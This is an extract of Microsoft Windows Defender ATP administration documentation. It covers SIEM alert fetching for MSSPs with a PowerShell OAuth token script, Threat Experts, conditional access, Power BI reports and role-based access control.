Include tenant-specific portal link - Alert link URL will have tenant specific parameter (tid=target_tenant_id)
that allows direct access to target tenant portal
Fetch alerts from MSSP customer's tenant into the SIEM system
NOTE
This action is taken by the MSSP.
To fetch alerts into your SIEM system you'll need to take the following steps:
Step 1: Create a third-party application
Step 2: Get access and refresh tokens from your customer's tenant
Step 3: Whitelist your application on Windows Defender Security Center
Step 1: Create an application in Azure Active Directory (Azure AD)
You'll need to create an application and grant it permissions to fetch alerts from your customer's Windows
Defender ATP tenant.
1. Sign in to the Azure AD portal.
2. Select Azure Active Directory > App registrations.
3. Click New application registration.
4. Specify the following values:
Name: <Tenant_name> SIEM MSSP Connector (replace Tenant_name with the tenant display name)
Sign-on URL: https://SiemMsspConnector
5. Click Create. The application is displayed in the list of applications you own.
6. Select the application, then click Settings > Properties.
7. Copy the value from the Application ID field.
8. Change the value in the App ID URI to: https://<domain_name>/SiemMsspConnector (replace
<domain_name> with the tenant name.
9. Ensure that the Multi-tenanted field is set to Yes.
10. In the Settings panel, select Reply URLs and add the following URL:
https://localhost:44300/wdatpconnector .
11. Click Save.

12. Select Keys and specify the following values:
Description: Enter a description for the key.
Expires: Select In 1 year
13. Click Save. Save the value is a safe place, you'll need this
Step 2: Get access and refresh tokens from your customer's tenant
This section guides you on how to use a PowerShell script to get the tokens from your customer's tenant. This
script uses the application from the previous step to get the access and refresh tokens using the OAuth
Authorization Code Flow.
After providing your credentials, you'll need to grant consent to the application so that the application is
provisioned in the customer's tenant.
1. Create a new folder and name it: MsspTokensAcquisition .
2. Download the LoginBrowser.psm1 module and save it in the MsspTokensAcquisition folder.
NOTE
In line 30, replace authorzationUrl with authorizationUrl .
3. Create a file with the following content and save it with the name MsspTokensAcquisition.ps1 in the folder:
param (
[Parameter(Mandatory=$true)][string]$clientId,
[Parameter(Mandatory=$true)][string]$secret,
[Parameter(Mandatory=$true)][string]$tenantId
)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Load our Login Browser Function

Import-Module .\LoginBrowser.psm1
# Configuration parameters
$login = "https://login.microsoftonline.com"
$redirectUri = "https://SiemMsspConnector"
$resourceId = "https://graph.windows.net"
Write-Host 'Prompt the user for his credentials, to get an authorization code'
$authorizationUrl = ("{0}/{1}/oauth2/authorize?prompt=select_account&response_type=code&client_id=
{2}&redirect_uri={3}&resource={4}" -f
$login, $tenantId, $clientId, $redirectUri, $resourceId)
Write-Host "authorzationUrl: $authorizationUrl"
# Fake a proper endpoint for the Redirect URI

$code = LoginBrowser $authorizationUrl $redirectUri
# Acquire token using the authorization code
$Body = @{
grant_type = 'authorization_code'
client_id = $clientId
code = $code
redirect_uri = $redirectUri
resource = $resourceId
client_secret = $secret
}
$tokenEndpoint = "$login/$tenantId/oauth2/token?"
$Response = Invoke-RestMethod -Method Post -Uri $tokenEndpoint -Body $Body
$token = $Response.access_token
$refreshToken= $Response.refresh_token
Write-Host " ----------------------------------- TOKEN ---------------------------------- "

Write-Host $token
Write-Host " ----------------------------------- REFRESH TOKEN ---------------------------------- "

Write-Host $refreshToken
4. Open an elevated PowerShell command prompt in the MsspTokensAcquisition folder.

5. Run the following command: Set-ExecutionPolicy -ExecutionPolicy Bypass
6. Enter the following commands:

.\MsspTokensAcquisition.ps1 -clientId <client_id> -secret <app_key> -tenantId <customer_tenant_id>
Replace <client_id> with the Application ID you got from the previous step.
Replace <app_key> with the application key you created from the previous step.
Replace <customer_tenant_id> with your customer's tenant ID.
7. You'll be asked to provide your credentials and consent. Ignore the page redirect.
8. In the PowerShell window, you'll receive an access token and a refresh token. Save the refresh token to
configure your SIEM connector.
Step 3: Whitelist your application on Windows Defender Security Center
You'll need to whitelist the application you created in Windows Defender Security Center.
You'll need to have Manage portal system settings permission to whitelist the application. Otherwise, you'll
need to request your customer to whitelist the application for you.
1. Go to https://securitycenter.windows.com?tid=<customer_tenant_id> (replace <customer_tenant_id> with
the customer's tenant ID.
2. Click Settings > SIEM.
3. Select the MSSP tab.
4. Enter the Application ID from the first step and your Tenant ID.
5. Click Authorize application.
You can now download the relevant configuration file for your SIEM and connect to the Windows Defender ATP
API. For more information see, Pull alerts to your SIEM tools.
In the ArcSight configuration file / Splunk Authentication Properties file you will have to write your application
key manually by settings the secret value.
Instead of acquiring a refresh token in the portal, use the script from the previous step to acquire a refresh
token (or acquire it by other means).
Fetch alerts from MSSP customer's tenant using APIs

For information on how to fetch alerts using REST API, see Pull alerts using REST API.
Related topics
Pull alerts using REST API
Configure and manage Microsoft Threat Experts
capabilities
Applies to:
IMPORTANT
Before you begin

To experience the full Microsoft Threat Experts targeted attack notification capability in Windows Defender ATP,
and preview the experts-on-demand capability, you need to have a valid Premier customer service and support
account. Premier charges will not be incurred during for the capability in preview, but for the generally available
capability, there will be charges.
You also need to ensure that you have Windows Defender ATP deployed in your environment with machines
enrolled, and not just on a laboratory set-up.
Register to Microsoft Threat Experts managed threat hunting service

If you're already a Windows Defender ATP customer, you can apply through the Windows Defender ATP portal.
1. From the navigation pane, go to Settings > General > Advanced features > Microsoft Threat Experts.
2. Click Apply.
3. Enter your name and email address so that Microsoft can get back to you on your application.
4. Read the privacy statement, then click Submit when you're done. You will receive a welcome email once
your application is approved.
5. From the navigation pane, go to Settings > General > Advanced features to turn the Threat Experts
toggle on. Click Save preferences.
Receive targeted attack notification from Microsoft Threat Experts

You can receive targeted attack notification from Microsoft Threat Experts through the following:
The Windows Defender ATP portal's Alerts dashboard
Your email, if you choose to configure it
To receive targeted attack notifications through email, you need to create an email notification rule.
Create an email notification rule
You can create rules to send email notifications for notification recipients. See Configure alert notifications to
create, edit, delete, or troubleshoot email notification, for details.
View the targeted attack notification

You'll start receiving targeted attack notification from Microsoft Threat Experts in your email after you have
configured your system to receive email notification.
1. Click the link in the email to go to the corresponding alert context in the dashboard tagged with Threat
experts.
2. From the dashboard, select the same alert topic that you got from the email, to view the details.
Ask a Microsoft threat expert about suspicious cybersecurity activities
in your organization
NOTE
The Microsoft Threat Experts' experts-on-demand capability is still in preview. You can only use the experts-on-demand
capability if you have applied for preview and your application has been approved.
You can partner with Microsoft Threat Experts who can be engaged directly from within the Windows Defender
Security Center for timely and accurate response. Experts provide insights needed to better understand complex
threats, targeted attack notifications that you get, or if you need more information about the alerts, a potentially
compromised machine, or a threat intelligence context that you see on your portal dashboard.
1. Navigate to the portal page with the relevant information that you'd like to investigate, for example, the
Incident page. Ensure that the page for the relevant alert or machine is in view before raising an inquiry.
2. From the upper right-hand menu, click ?, then select Ask a threat expert.
3. Asking a threat expert is a two-step process: you need to provide the necessary information and open a
support ticket.
Step 1: Provide information
a. Provide enough information to give the Microsoft Threat Experts enough context to start the
investigation. Select the inquiry category from the Provide information > Inquiry details drop-down
menu.
b. Enter the additional details to give the threat experts more context of what you’d like to investigate. Click
Next, and it takes you to the Open support ticket tab.
c. Remember to use the ID number from the Open a support ticket tab page and include it to the details
you will provide in the subsequent Customer Services and Support (CSS ) pages.
Step 2: Open a support ticket
NOTE
To experience the full Microsoft Threat Experts preview capability in Windows Defender ATP, you need to have a
Premier customer service and support account. However, you will not be charged for the Experts-on-demand service
during the preview.
a. In the New support request customer support page, select the following from the dropdown menu and
then click Next:
Select the product family: Security
Select a product: Microsoft Threat Experts
Select a category that best describes the issue: Windows Defender ATP
Select a problem that best describes the issue: Choose according to your inquiry category
b. Fill out the fields with the necessary information about the issue and use the auto-generated ID when
you open a Customer Services and Support (CSS ) ticket. Then, click Next.
c. In the Select a support plan page, select Professional No Charge.
d. The severity of your issue has been pre-selected by default, per the support plan, Professional No
Charge, that you'll use for this public preview. Select the time zone by which you'd like to receive the
correspondence. Then, click Next.
e. Verify your contact details and add another if necessary. Then, click Next.
f. Review the summary of your support request, and update if necessary. Make sure that you read and
understand the Microsoft Services Agreement and Privacy Statement. Then, click Submit. You will see
the confirmation page indicating the response time and your support request number.
Sample questions to ask Microsoft Threat Experts

Alert information
We see a new type of alert for a living-off-the-land binary: [AlertID ]. Can you tell us something more about this
alert and how we can investigate further?
We’ve observed two similar attacks which try to execute malicious PowerShell scripts but generate different
alerts. One is "Suspicious Powershell command line" and the other is "A malicious file was detected based on
indication provided by O365". What is the difference?
I receive an odd alert today for abnormal number of failed logins from a high profile user’s device. I cannot find
any further evidence around these sign-in attempts. How can Windows Defender see these attempts? What
type of sign-ins are being monitored?
Can you give more context or insights about this alert: “Suspicious behavior by a system utility was observed”.
Possible machine compromise
Can you please help answer why we see “Unknown process observed?” This is seen quite frequently on many
machines and we would appreciate input on whether this is related to malicious activity.
Can you help validate a possible compromise on the following system on [date] with similar behaviors as the
previous [malware name] malware detection on the same system in [month]?
Threat intelligence details
This morning, we detected a phishing email that delivered a malicious Word document to a user. This caused a
series of suspicious events which triggered multiple Windows Defender alerts for [malware name] malware.
Do you have any information on this malware? If yes, can you please send me a link?
I recently saw a [social media reference e.g. Twitter or blog] post about a threat that is targeting my industry.
Can you help me understand what protection Windows Defender ATP provides against this threat actor?
Microsoft Threat Experts’ alert communications
Can your incident response team help us address the targeted attack notification that we got?
I received this targeted attack notification from Microsoft Threat Experts. We don’t have our own incident
response team. What can we do now, and how can we contain the incident?
I received a targeted attack notification from Microsoft Threat Experts. What data can you provide to us that
we can pass on to our incident response team?
NOTE
Microsoft Threat Experts is a managed cybersecurity hunting service and not an incident response service. However,
the experts can seamlessly transition the investigation to Microsoft Cybersecurity Solutions Group (CSG)'s Detection
and Response Team (DART) services, when necessary. You can also opt to engage with your own incident response
team to address issues that requires an incident response.
Scenario
Receive a progress report about your managed hunting inquiry
Response from Microsoft Threat Experts varies according to your inquiry. They will email a progress report to you
regarding the Ask a threat expert inquiry that you've submitted, within two days, to communicate the investigation
status from the following categories:
More information is needed to continue with the investigation
A file or several file samples are needed to determine the technical context
Investigation requires more time
Initial information was enough to conclude the investigation
It is crucial to respond in a timely manner to keep the investigation moving. See the Premier customer service and
support service level agreement for details.
Configure conditional access in Windows Defender
ATP
Applies to:
This section guides you through all the steps you need to take to properly implement conditional access.
Before you begin
WARNING
It's important to note that Azure AD registered devices is not supported in this scenario.
Only Intune enrolled devices are supported.
You need to make sure that all your devices are enrolled in Intune. You can use any of the following options to
enroll devices in Intune:
IT Admin: For more information on how to enabling auto-enrollment, see Windows Enrollment
End-user: For more information on how to enroll your Windows 10 device in Intune, see Enroll your Windows
10 device in Intune
End-user alternative: For more information on joining an Azure AD domain, see Set up Azure Active Directory
joined devices.
There are steps you'll need to take in Windows Defender Security Center, the Intune portal, and Azure AD portal.
NOTE
You'll need a Microsoft Intune environment, with Intune managed and Azure AD joined Windows 10 devices.
Take the following steps to enable conditional access:

Step 1: Turn on the Microsoft Intune connection from Windows Defender Security Center
Step 2: Turn on the Windows Defender ATP integration in Intune
Step 3: Create the compliance policy in Intune
Step 4: Assign the policy
Step 5: Create an Azure AD conditional access policy
Step 1: Turn on the Microsoft Intune connection
1. In the navigation pane, select Settings > Advanced features > Microsoft Intune connection.
2. Toggle the Microsoft Intune setting to On.
3. Click Save preferences.
Step 2: Turn on the Windows Defender ATP integration in Intune
2. Select Device compliance > Windows Defender ATP.
3. Set Connect Windows 10.0.15063+ devices to Windows Defender Advanced Threat Protection to On.
4. Click Save.
Step 3: Create the compliance policy in Intune
1. In the Azure portal, select All services, filter on Intune, and select Microsoft Intune.
2. Select Device compliance > Policies > Create policy.
3. Enter a Name and Description.
4. In Platform, select Windows 10 and later.
5. In the Device Health settings, set Require the device to be at or under the Device Threat Level to
your preferred level:
Secured: This level is the most secure. The device cannot have any existing threats and still access
company resources. If any threats are found, the device is evaluated as noncompliant.
Low: The device is compliant if only low -level threats exist. Devices with medium or high threat levels
are not compliant.
Medium: The device is compliant if the threats found on the device are low or medium. If high-level
threats are detected, the device is determined as noncompliant.
High: This level is the least secure, and allows all threat levels. So devices that with high, medium or low
threat levels are considered compliant.
6. Select OK, and Create to save your changes (and create the policy).
Step 4: Assign the policy
1. In the Azure portal, select All services, filter on Intune, and select Microsoft Intune.
2. Select Device compliance > Policies> select your Windows Defender ATP compliance policy.
3. Select Assignments.
4. Include or exclude your Azure AD groups to assign them the policy.
5. To deploy the policy to the groups, select Save. The user devices targeted by the policy are evaluated for
compliance.
Step 5: Create an Azure AD conditional access policy
1. In the Azure portal, open Azure Active Directory > Conditional access > New policy.
2. Enter a policy Name, and select Users and groups. Use the Include or Exclude options to add your groups for
the policy, and select Done.
3. Select Cloud apps, and choose which apps to protect. For example, choose Select apps, and select Office
365 SharePoint Online and Office 365 Exchange Online. Select Done to save your changes.
4. Select Conditions > Client apps to apply the policy to apps and browsers. For example, select Yes, and
then enable Browser and Mobile apps and desktop clients. Select Done to save your changes.
5. Select Grant to apply conditional access based on device compliance. For example, select Grant access >
Require device to be marked as compliant. Choose Select to save your changes.
6. Select Enable policy, and then Create to save your changes.
For more information, see Enable Windows Defender ATP with conditional access in Intune.

Configure Microsoft Cloud App Security in Windows
Defender ATP
Applies to:
IMPORTANT
To benefit from Windows Defender Advanced Threat Protection (ATP ) cloud app discovery signals, turn on
Microsoft Cloud App Security integration.
NOTE
This feature will be available with an E5 license for Enterprise Mobility + Security on machines running Windows 10, version
1709 (OS Build 16299.1085 with KB4493441), Windows 10, version 1803 (OS Build 17134.704 with KB4493464), Windows
10, version 1809 (OS Build 17763.379 with KB4489899) or later Windows 10 versions.
1. In the navigation pane, select Preferences setup > Advanced features.

2. Select Microsoft Cloud App Security and switch the toggle to On.
Once activated, Windows Defender ATP will immediately start forwarding discovery signals to Cloud App
Security.
View the data collected

1. Browse to the Cloud App Security portal.
2. Navigate to the Cloud Discovery dashboard.
3. Select Win10 Endpoint Users report, which contains the data coming from Windows Defender ATP.
This report is similar to the existing discovery report with one major difference: you can now benefit from visibility
to the machine context.
Notice the new Machines tab that allows you to view the data split to the device dimensions. This is available in
the main report page or any subpage (for example, when drilling down to a specific cloud app).
For more information about cloud discovery, see Working with discovered apps.
If you are interested in trying Microsoft Cloud App Security, see Microsoft Cloud App Security Trial.
Related topic
Microsoft Cloud App Security integration
Configure information protection in Windows
Applies to:
Learn how you can use Windows Defender ATP to expand the coverage of Windows Information Protection (WIP )
to protect files based on their label, regardless of their origin.
TIP
Read our blog post about how Windows Defender ATP integrates with Microsoft Information Protection to discover, protect,
and monitor sensitive data on Windows devices.
Prerequisites
Endpoints need to be on Windows 10, version 1809 or later
You'll need the appropriate license to leverage the Windows Defender ATP and Azure Information Protection
integration
Your tenant needs to be onboarded to Azure Information Protection analytics, for more information see,
Configure a Log Analytics workspace for the reports
Configuration steps
1. Define a WIP policy and assign it to the relevant devices. For more information, see Protect your enterprise
data using Windows Information Protection (WIP ). If WIP is already configured on the relevant devices, skip
this step.
2. Define which labels need to get WIP protection in Office 365 Security and Compliance.
a. Go to: Classifications > Labels.
b. Create a new label or edit an existing one.
c. In the configuration wizard, go to 'Data loss prevention' tab and enable WIP.
d. Repeat for every label that you want to get WIP applied to in Windows.
After completing these steps Windows Defender ATP will automatically identify labeled documents stored on the
device and enable WIP on them.
NOTE
The Windows Defender ATP configuration is pulled every 15 minutes. Allow up to 30 minutes for the new policy to take
effect and ensure that the endpoint is online. Otherwise, it will not receive the policy.
Data forwarded to Azure Information Protection is stored in the same location as your other Azure Information
Protection data.
Related topic
Configure Windows Defender Security Center
settings
Applies to:
Use the Settings menu to modify general settings, advanced features, enable the preview experience, email
notifications, and the custom threat intelligence feature.
In this section
TOPIC DESCRIPTION
General settings Modify your general settings that were previously defined as
part of the onboarding process.
Permissions Manage portal access using RBAC as well as machine groups.
APIs Enable the threat intel and SIEM integration.
Rules Configure suppressions rules and automation settings.
Machine management Onboard and offboard machines.

Update data retention settings for Windows
Defender ATP
Applies to:
During the onboarding process, a wizard takes you through the general settings of Windows Defender ATP. After
onboarding, you might want to update the data retention settings.
1. In the navigation pane, select Settings > Data rention.
2. Select the data retention duration from the drop-down list.
NOTE
Other settings are not editable.
Related topics
Configure alert notifications in Windows Defender ATP
Enable and create Power BI reports using Windows Defender ATP data
Enable Secure Score security controls
Configure alert notifications in Windows Defender
ATP
Applies to:
You can configure Windows Defender ATP to send email notifications to specified recipients for new alerts. This
feature enables you to identify a group of individuals who will immediately be informed and can act on alerts
based on their severity.
NOTE
Only users with 'Manage security settings' permissions can configure email notifications. If you've chosen to use basic
permissions management, users with Security Administrator or Global Administrator roles can configure email notifications.
You can set the alert severity levels that trigger notifications. You can also add or remove recipients of the email
notification. New recipients get notified about alerts encountered after they are added. For more information
about alerts, see View and organize the Alerts queue.
If you're using role-based access control (RBAC ), recipients will only receive notifications based on the machine
groups that were configured in the notification rule. Users with the proper permission can only create, edit, or
delete notifications that are limited to their machine group management scope. Only users assigned to the Global
administrator role can manage notification rules that are configured for all machine groups.
The email notification includes basic information about the alert and a link to the portal where you can do further
investigation.
Create rules for alert notifications

You can create rules that determine the machines and alert severities to send email notifications for and the
notification recipients.
1. In the navigation pane, select Settings > Alert notifications.
2. Click Add notification rule.
3. Specify the General information:
Rule name - Specify a name for the notification rule.
Include organization name - Specify the customer name that appears on the email notification.
Include tenant-specific portal link - Adds a link with the tenant ID to allow access to a specific tenant.
Include machine information - Includes the machine name in the email alert body.
NOTE
This information might be processed by recipient mail servers that ar not in the geographic location you
have selected for your Windows Defender ATP data.
Machines - Choose whether to notify recipients for alerts on all machines (Global administrator
role only) or on selected machine groups. For more information, see Create and manage machine
groups.
Alert severity - Choose the alert severity level.
4. Click Next.
5. Enter the recipient's email address then click Add recipient. You can add multiple email addresses.
6. Check that email recipients are able to receive the email notifications by selecting Send test email.
7. Click Save notification rule.
Here's an example email notification:
Edit a notification rule

1. Select the notification rule you'd like to edit.
2. Update the General and Recipient tab information.
3. Click Save notification rule.
Delete notification rule

1. Select the notification rule you'd like to delete.
2. Click Delete.
Troubleshoot email notifications for alerts

This section lists various issues that you may encounter when using email notifications for alerts.
Problem: Intended recipients report they are not getting the notifications.
Solution: Make sure that the notifications are not blocked by email filters:
1. Check that the Windows Defender ATP email notifications are not sent to the Junk Email folder. Mark them as
Not junk.
2. Check that your email security product is not blocking the email notifications from Windows Defender ATP.
3. Check your email application rules that might be catching and moving your Windows Defender ATP email
notifications.
Related topics
Create and build Power BI reports using Windows
Defender ATP data
Applies to:
IMPORTANT
TIP
Go to Advanced features in the Settings page to turn on the preview features.
Understand the security status of your organization, including the status of machines, alerts, and investigations
using the Windows Defender ATP reporting feature that integrates with Power BI.
Windows Defender ATP supports the use of Power BI data connectors to enable you to connect and access
Windows Defender ATP data using Microsoft Graph.
Data connectors integrate seamlessly in Power BI, and make it easy for power users to query, shape and combine
data to build reports and dashboards that meet the needs of your organization.
You can easily get started by:
Creating a dashboard on the Power BI service
Building a custom dashboard on Power BI Desktop and tweaking it to fit the visual analytics and reporting
requirements of your organization
You can access these options from Windows Defender Security Center. Both the Power BI service and Power BI
Desktop are supported.
Create a Windows Defender ATP dashboard on Power BI service

Windows Defender ATP makes it easy to create a Power BI dashboard by providing an option straight from the
portal.
1. In the navigation pane, select Settings > Power BI reports.
2. Click Create dashboard.
You'll see a notification that things are being loaded.
NOTE
Loading your data in the Power BI service can take a few minutes.

4. Click Sign in. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to
sign in and give consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing
refresh.
NOTE

For more information, see Create a Power BI dashboard from a report.
Create a Power BI dashboard from the Power BI portal

1. Login to Power BI.
2. Click Get Data.
3. Select Microsoft AppSource > My Organization > Get.
4. In the AppSource window, select Apps and search for Windows Defender Advanced Threat Protection.
5. Click Get it now.
7. Click Sign in. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to
sign in and give consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing
refresh.
NOTE
Build a custom Windows Defender ATP dashboard in Power BI

Desktop
You can create a custom dashboard in Power BI Desktop to create visualizations that cater to the specific views
that your organization requires.
Before you begin
1. Make sure you use Power BI Desktop June 2017 and above. Download the latest version.
2. In the Windows Defender Security Center navigation pane, select Settings > Power BI reports.
3. Click Download connector to download the WDATPPowerBI.zip file and extract it.
4. Create a new directory Microsoft Power BI Desktop\Custom Connectors under the user's Documents folder.
5. Copy WDATPDataConnector.mez from the zip to the directory you just created.
6. Open Power BI Desktop.
7. Click File > Options and settings > Custom data connectors.
8. Select New table and matrix visuals and Custom data connectors and click OK.
NOTE
If you are using Power BI Desktop July 2017 version (or later), you won't need to select New table and matrix
visuals. You'll only need to select Custom data connectors.
9. Restart Power BI Desktop.
Customize the Windows Defender ATP Power BI dashboard

After completing the steps in the Before you begin section, you can proceed with building your custom
dashboard.
1. Open WDATPPowerBI.pbit from the zip with Power BI Desktop.
consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing Windows
Defender ATP Power BI to sign in and read your profile, and access your data.
Mashup Windows Defender ATP data with other data sources

You can use Power BI Desktop to analyse data from Windows Defender ATP and mash that data up with other
data sources to gain better security perspective in your organization.
1. In Power BI Desktop, in the Home ribbon, click Get data and search for Windows Defender Advanced
Threat Protection.
2. Click Connect.
3. On the Preview Connector windows, click Continue.
consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing Windows
Defender ATP Power BI to sign in and read your profile, and access your data.
6. In the Navigator dialog box, select the Windows Defender ATP feeds you'd like to download and use in
your reports and click Load. Data will start to be downloaded from the Microsoft Graph.
7. Load other data sources by clicking Get data item in the Home ribbon, and select another data source.
8. Add visuals and select fields from the available data sources.
Using the Power BI reports

There are a couple of tabs on the report that's generated:
Machine and alerts
Investigation results and action center
Secure Score
In general, if you know of a specific threat name, CVE, or KB, you can identify machines with unpatched
vulnerabilities that might be leveraged by threats. This report also helps you determine whether machine-level
mitigations are configured correctly on the machines and prioritize those that might need attention.
Related topic
Beta Create custom Power BI reports
Applies to:
Set the baselines for calculating the score of Windows Defender security controls on the Secure Score dashboard.
If you use third-party solutions, consider excluding the corresponding controls from the calculations.
NOTE
Changes might take up to a few hours to reflect on the dashboard.
1. In the navigation pane, select Settings > Secure Score.

2. Select the security control, then toggle the setting between On and Off.
Related topics
View the Secure Score dashboard
Update data retention settings for Windows Defender ATP
Configure alert notifications in Windows Defender ATP
Configure advanced features in Windows Defender ATP
Configure advanced features in Windows Defender
ATP
Applies to:
Depending on the Microsoft security products that you use, some advanced features might be available for you
to integrate Windows Defender ATP with.
Use the following advanced features to get better protected from potentially malicious files and gain better
insight during security investigations:
Automated investigation
When you enable this feature, you'll be able to take advantage of the automated investigation and remediation
features of the service. For more information, see Automated investigations.
Auto-resolve remediated alerts

For tenants created on or after Windows 10, version 1809 the automated investigations capability is configured
by default to resolve alerts where the automated analysis result status is "No threats found" or "Remediated". If
you don’t want to have alerts auto-resolved, you’ll need to manually turn off the feature.
TIP
For tenants created prior that version, you'll need to manually turn this feature on from the Advanced features page.
NOTE
The result of the auto-resolve action may influence the Machine risk level calculation which is based on the active alerts
found on a machine.
If a security operations analyst manually sets the status of an alert to "In progress" or "Resolved" the auto-resolve
capability will not overwrite it.
Block file
This feature is only available if your organization uses Windows Defender Antivirus as the active antimalware
solution and that the cloud-based protection feature is enabled, see Block files in your network for more details.
If your organization satisfies these conditions, the feature is enabled by default. This feature enables you to block
potentially malicious files in your network. This operation will prevent it from being read, written, or executed on
machines in your organization.
Show user details

When you enable this feature, you'll be able to see user details stored in Azure Active Directory including a
user's picture, name, title, and department information when investigating user account entities. You can find
user account information in the following views:
Security operations dashboard
Alert queue
Machine details page
For more information, see Investigate a user account.
Skype for Business integration

Enabling the Skype for Business integration gives you the ability to communicate with users using Skype for
Business, email, or phone. This can be handy when you need to communicate with the user and mitigate risks.
NOTE
When a machine is being isolated from the network, there's a pop-up where you can choose to enable Outlook and Skype
communications which allows communications to the user while they are disconnected from the network. This setting
applies to Skype and Outlook communication when machines are in isolation mode.
Azure Advanced Threat Protection integration

The integration with Azure Advanced Threat Protection allows you to pivot directly into another Microsoft
Identity security product. Azure Advanced Threat Protection augments an investigation with additional insights
about a suspected compromised account and related resources. By enabling this feature, you'll enrich the
machine-based investigation capability by pivoting across the network from an identify point of view.
NOTE
Enable the Windows Defender ATP integration from the Azure ATP portal
To receive contextual machine integration in Azure ATP, you'll also need to enable the feature in the Azure ATP
portal.
1. Login to the Azure portal with a Global Administrator or Security Administrator role.
2. Click Create a workspace or use your primary workspace.
3. Toggle the Integration setting to On and click Save.
When you complete the integration steps on both portals, you'll be able to see relevant alerts in the machine
details or user details page.
Office 365 Threat Intelligence connection

This feature is only available if you have an active Office 365 E5 or the Threat Intelligence add-on. For more
information, see the Office 365 Enterprise E5 product page.
When you enable this feature, you'll be able to incorporate data from Office 365 Advanced Threat Protection
into Windows Defender Security Center to conduct a holistic security investigation across Office 365 mailboxes
and Windows machines.
NOTE
To receive contextual machine integration in Office 365 Threat Intelligence, you'll need to enable the Windows
Defender ATP settings in the Security & Compliance dashboard. For more information, see Office 365 Threat
Intelligence overview.

Out of the two Microsoft Threat Expert components, targeted attack notification is in general availability, while
experts-on-demand capability is still in preview. You can only use the experts-on-demand capability if you have
applied for preview and your application has been approved. You can receive targeted attack notifications from
Microsoft Threat Experts through your Windows Defender ATP portal's alerts dashboard and via email if you
configure it.
NOTE
The Microsoft Threat Experts capability in Windows Defender ATP is available with an E5 license for Enterprise Mobility +
Security.

Enabling this setting forwards Windows Defender ATP signals to Microsoft Cloud App Security to provide
deeper visibility into cloud application usage. Forwarded data is stored and processed in the same location as
your Cloud App Security data.
NOTE
This feature is available with an E5 license for Enterprise Mobility + Security on machines running Windows 10 version
1809 or later.
Azure Information Protection

Turning this setting on forwards signals to Azure Information Protection, giving data owners and administrators
visibility into protected data on onboarded machines and machine risk ratings.
Microsoft Intune connection

This feature is only available if you have an active Microsoft Intune (Intune) license.
When you enable this feature, you'll be able to share Windows Defender ATP device information to Intune and
enhance policy enforcement.
NOTE
You'll need to enable the integration on both Intune and Windows Defender ATP to use this feature.
Preview features
Learn about new features in the Windows Defender ATP preview release and be among the first to try
upcoming features by turning on the preview experience.
You'll have access to upcoming features which you can provide feedback on to help improve the overall
experience before features are generally available.
Enable advanced features

1. In the navigation pane, select Preferences setup > Advanced features.
2. Select the advanced feature you want to configure and toggle the setting between On and Off.
Related topics
Configure alert notifications
Applies to:
Refer to the instructions below to use basic permissions management.

You can use either of the following:
Azure PowerShell
Azure Portal
For granular control over permissions, switch to role-based access control.
Assign user access using Azure PowerShell

You can assign users with one of the following levels of permissions:
Full access (Read and Write)
Read-only access
Before you begin
Install Azure PowerShell. For more information see, How to install and configure Azure PowerShell.
NOTE
You need to run the PowerShell cmdlets in an elevated command-line.
Connect to your Azure Active Directory. For more information see, Connect-MsolService.
Full access
Users with full access can log in, view all system information and resolve alerts, submit files for deep analysis, and
download the onboarding package. Assigning full access rights requires adding the users to the "Security
Administrator" or "Global Administrator" AAD built-in roles.
Read only access
Users with read only access can log in, view all alerts, and related information. They will not be able to change
alert states, submit files for deep analysis or perform any state changing operations. Assigning read only access
rights requires adding the users to the "Security Reader" AAD built-in role.
Use the following steps to assign security roles:
For read and write access, assign users to the security administrator role by using the following command:
text Add-MsolRoleMember -RoleName "Security Administrator" -RoleMemberEmailAddress
"secadmin@Contoso.onmicrosoft.com"
For read only access, assign users to the security reader role by using the following command:
text Add-MsolRoleMember -RoleName "Security Reader" -RoleMemberEmailAddress
"reader@Contoso.onmicrosoft.com"
For more information see, Add or remove group memberships.
Assign user access using the Azure portal

For more information, see Assign administrator and non-administrator roles to uses with Azure Active Directory.
Related topic
Manage portal access using role-based access
control
Applies to:
Office 365
Using role-based access control (RBAC ), you can create roles and groups within your security operations team
to grant appropriate access to the portal. Based on the roles and groups you create, you have fine-grained
control over what users with access to the portal can see and do.
Large geo-distributed security operations teams typically adopt a tier-based model to assign and authorize
access to security portals. Typical tiers include the following three levels:
TIER DESCRIPTION
Tier 1 Local security operations team / IT team

This team usually triages and investigates alerts contained
within their geolocation and escalates to Tier 2 in cases
where an active remediation is required.
Tier 2 Regional security operations team

This team can see all the machines for their region and
perform remediation actions.
Tier 3 Global security operations team

This team consists of security experts and are authorized to
see and perform all actions from the portal.
Windows Defender ATP RBAC is designed to support your tier- or role-based model of choice and gives you
granular control over what roles can see, machines they can access, and actions they can take. The RBAC
framework is centered around the following controls:
Control who can take specific action
Create custom roles and control what Windows Defender ATP capabilities they can access with
granularity.
Control who can see information on specific machine group or groups
Create machine groups by specific criteria such as names, tags, domains, and others, then grant role
access to them using a specific Azure Active Directory (Azure AD ) user group.
To implement role-based access, you'll need to define admin roles, assign corresponding permissions, and
assign Azure AD user groups assigned to the roles.
Before you begin
Before using RBAC, it's important that you understand the roles that can grant permissions and the
consequences of turning on RBAC.
WARNING
Before enabling the feature, it's important that you have a Global Administrator role or Security Administrator role in
Azure AD and that you have your Azure AD groups ready to reduce the risk of being locked out of the portal.
When you first log in to Windows Defender Security Center, you're granted either full access or read only
access. Full access rights are granted to users with Security Administrator or Global Administrator roles in
Azure AD. Read only access is granted to users with a Security Reader role in Azure AD.
Someone with a Windows Defender ATP Global administrator role has unrestricted access to all machines,
regardless of their machine group association and the Azure AD user groups assignments
WARNING
Initially, only those with Azure AD Global Administrator or Security Administrator rights will be able to create and assign
roles in Windows Defender Security Center, therefore, having the right groups ready in Azure AD is important.
Turning on role-based access control will cause users with read-only permissions (for example, users assigned
to Azure AD Security reader role) to lose access until they are assigned to a role.
Users with admin permissions are automatically assigned the default built-in Windows Defender ATP global administrator
role with full permissions. After opting in to use RBAC, you can assign additional users that are not Azure AD Global or
Security Administrators to the Windows Defender ATP global administrator role.
After opting in to use RBAC, you cannot revert to the initial roles as when you first logged into the portal.
Related topic
Create and manage machine groups in Windows Defender ATP
Create and manage roles for role-based access
control
Applies to:
Create roles and assign the role to an Azure Active Directory

group
